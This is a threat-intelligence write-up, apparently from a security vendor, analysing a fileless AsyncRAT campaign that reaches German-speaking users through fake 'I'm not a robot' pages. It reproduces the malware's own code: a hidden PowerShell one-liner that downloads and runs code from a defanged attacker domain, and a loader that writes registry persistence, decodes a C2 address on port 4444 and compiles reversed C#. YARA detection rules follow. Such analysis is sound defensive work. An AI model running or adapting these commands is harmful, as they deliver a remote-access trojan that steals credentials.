🚀 CloudSEK has raised $19M Series B1 Round – Powering the Future of Predictive Cybersecurity
Read More
A fileless AsyncRAT campaign is targeting German-speaking users via a fake “I’m not a robot” prompt that executes malicious PowerShell code. Delivered through Clickfix-themed sites, it abuses system utilities to load obfuscated C# code in memory, enabling full remote access and credential theft. It persists via registry keys and communicates with a C2 server on port 4444. Organizations should block suspicious PowerShell activity and scan memory for threats.
A fileless AsyncRAT joins the Clickfix party, with an obfuscated PowerShell-based campaign. The malware is delivered via a fake verification prompt that lures users into executing a malicious command. Based on the linguistic preferences in the verification prompt, we can ascertain with high confidence that the campaign is targeted towards German speaking users. The chain abuses legitimate system utilities and in-memory C# loaders with reversed strings to evade detection. Once executed, the malware establishes persistence through registry keys and connects to a remote TCP C2 server on port 4444. It enables full remote control, credential theft, and data exfiltration — all without dropping files to disk. Mitigations include blocking suspicious PowerShell execution, monitoring registry activity, and scanning memory for in-memory payloads commonly used in LOLBins-based delivery methods.
During the routine attacker infrastructure discovery and attribution cycle, we discovered a Clickfix themed delivery website.
When the victim clicks on “I’m not a robot”, a command is copied to the clipboard, and instructions are displayed for the victim to follow.
conhost.exe --headless powershell -w hidden -nop -c $x =
[System.Text.Encoding]::UTF8.GetString((Invoke-webrequest -URI
'http://namoet[.]de:80/x').Content); cmd /c $x" Drücke enter um deine identität zu bestätigen!
The string “Drücke enter um deine identität zu bestätigen!” within the command, translates to "Press enter to confirm your identity!". This suggests that the clickfix delivery page is designed to target German speaking users.
powershell -w hidden -nop -c
$x = [System.Text.Encoding]::UTF8.GetString((Invoke-webrequest -URI 'http://namoet[.]de:80/x').Content)
The command assumes that the content is UTF-8 encoded text, and decodes it as a string.
*The contents of the downloaded payload “x” can be found in the Appendix.
cmd /c $x
$c = 'conhost.exe --headless powershell -nop -w hidden -c '+[char]34+$MyInvocation.MyCommand+[char]34;
Set-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' 'windows' ...
Set-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows' 'win' $c;
$f = 'ask=' + '=gClRmL' + '0V2b' + 'tFm' + 'blk=';
$d = $f.Substring(3,16).ToCharArray();
[array]::reverse($d);
$y = [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String($d -join ''));
$g = '<obfuscated and reversed C# code>';
$l = $g.ToCharArray();
[array]::reverse($l);
Add-Type -TypeDefinition $($l -join '');
*The contents of “$l” can be found in the Appendix.
[B]::ma($y.Trim())
$f='ask='+'=gClRmL'+'0V2b'+'tFm'+'blk=';
$d=$f.Substring(3,16).ToCharArray();
[array]::reverse($d);
$y=[System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String($d -join ''));
Breaking this down:
$f = 'ask=' + '=gClRmL' + '0V2b' + 'tFm' + 'blk='
= 'ask==gClRmL0V2btFmblk='
$f.Substring(3,16)
= '=gClRmL0V2btFmbl'
# Before reverse: '=gClRmL0V2btFmbl'
# After reverse: 'lbmFtbt2V0LmRlLg='
Base64 string: 'lbmFtbt2V0LmRlLg='
Decoded: 'namoet[.]de:4444'
On certain exit codes, it kills itself with GetCurrentProcess().Kill().
In our sample:
conhost.exe --headless powershell -w hidden -nop -c ...
This execution pattern is frequently observed in AsyncRAT delivery.
The payload contains:
Add-Type -TypeDefinition $($l -join '')
[B]::ma($y.Trim())
The .NET code contains:
TcpClient b = new TcpClient(); b.Connect(d, e);
...
while (true) { c.Read(...) ...}
that’s indicative of a long-running backchannel—very characteristic of AsyncRAT's C2 logic.
The malware sets persistence using:
Set-ItemProperty 'HKCU:\...RunOnce' ...
AsyncRAT variants often use HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce or Run for user-level persistence without triggering UAC.
As we know, the clickfix delivery page copied a command that was appended by the text “Drücke enter um deine identität zu bestätigen!”. Upon using the text in the copied command as a pivot point, we discovered additional attacker controlled infrastructure that were used in the same campaign for clickfix delivery and C2 operations.
Based on the additional infrastructure discovered, we can ascertain with medium confidence that this campaign has been running since at least April 2025.
rule AsyncRAT_Memory_Resident_Reversed_Loader
{
meta:
author = "CloudSEK Cyber Threat Intelligence"
description = "Detects AsyncRAT C# loader code in memory, focusing on reversed strings and reflective loading behavior"
malware_family = "AsyncRAT"
date = "2025-06-12"
scope = "memory"
strings:
// Reversed .NET namespaces indicating obfuscation
$s1 = "gnidaerhT.metsyS gnisu" ascii
$s2 = "txeT.metsyS gnisu" ascii
$s3 = "stekcoS.teN.metsyS gnisu" ascii
$s4 = "scitsongaiD.metsyS gnisu" ascii
// Add-Type used at runtime
$s5 = "Add-Type -TypeDefinition" ascii
// TcpClient logic reversed (in-memory string form)
$s6 = "tneilCpcT wen = b tneilCpcT cilbup" ascii
$s7 = ")(f;)(maertSteG.b = c;)e ,d(tcennoC.b" ascii
// Function signatures reversed
$s8 = "diov citats cilbup" ascii
$s9 = "ssalc cilbup" ascii
// Registry persistence reversed (optional)
$s10 = "'nosiW' = yek'1UR\\...'KUH" wide ascii nocase
condition:
5 of ($s*)
}
rule AsyncRAT_PowerShell_ReversedLoader
{
meta:
author = "CloudSEK Cyber Threat Intelligence"
description = "Detects AsyncRAT payloads using PowerShell with reversed base64-encoded C# and Add-Type loader"
malware_family = "AsyncRAT"
date = "2025-06-12"
strings:
// PowerShell pattern using common obfuscation flags
$ps_flags = "powershell -nop -w hidden -c" ascii
// Use of Add-Type to compile C# code at runtime
$add_type = "Add-Type -TypeDefinition" ascii
// Registry persistence keys
$reg1 = "HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce" ascii
$reg2 = "HKCU:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows" ascii
// Reversed C# namespace common to AsyncRAT
$rev_using = "gnidaerhT.metsyS gnisu" ascii
$rev_dns = ")]0[w(gnirtSteG.tluafeD.gnidocnE = emaNeliF" ascii
// TcpClient and Connect() reversed calls in .NET
$tcp_client = "tneilCpcT wen = b tneilCpcT cilbup" ascii
$connect_call = ")(f;)(maertSteG.b = c;)e ,d(tcennoC.b" ascii
// Common TCP port used (4444) for C2
$port_4444 = "4444" ascii
condition:
all of ($ps_flags, $add_type, $reg1, $rev_using, $tcp_client) and
any of ($reg2, $rev_dns, $port_4444, $connect_call)
}
Take action now
CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.
Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.
Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.
Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.
Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.